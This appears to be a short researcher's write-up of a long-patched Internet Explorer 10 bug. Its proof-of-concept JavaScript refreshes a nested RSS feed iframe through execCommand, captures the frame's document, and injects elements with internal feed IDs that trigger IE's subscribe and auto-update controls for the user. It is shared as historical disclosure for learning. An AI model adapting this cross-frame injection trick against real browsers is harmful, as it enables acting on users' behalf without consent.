After playing around with RSS feeds framed inside iFrames, I found that loading a feed's XML in an iFrame and then refreshing it via execCommand gave the parent page access to the internally generated HTML that IE renders for feeds — something that had been blocked in earlier versions.
// On load, refresh the nested feed frame via execCommand.
window.onload = function() {
    window[0][0].document.execCommand("Refresh");
};

// Store the frame's document and document mode on the parent,
// then write markup that uses the internal RSS element IDs into its body.
function main() {
    window[0].location = "javascript:void(parent.oDocument = document);void(parent.iFrameDocumentMode = document.documentMode)";
    var str = 'We are inside the rss-feeds iFrame.<br />' +
        '<span id="_turnonsynceng_" style="cursor:hand">Click here to turn on Automatic Feed Updates</span><br />' +
        '<span id="_subscribe_" style="cursor:hand">Click here to Subscribe Feeds</span><br />' +
        '<span id="_markasreadtoggle_" style="cursor:hand">Click here to Mark Feeds as read</span><br />';
    oDocument.body.innerHTML = str;
}
The feed page loads at a lower document mode than the host page, which itself opens interesting mixing possibilities. Once the oDocument reference is obtained, elements with known internal RSS IDs (like _subscribe_) can be injected, triggering IE’s own feed-management UI on behalf of the user. Tested on Win8 RTM IE10 Desktop.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.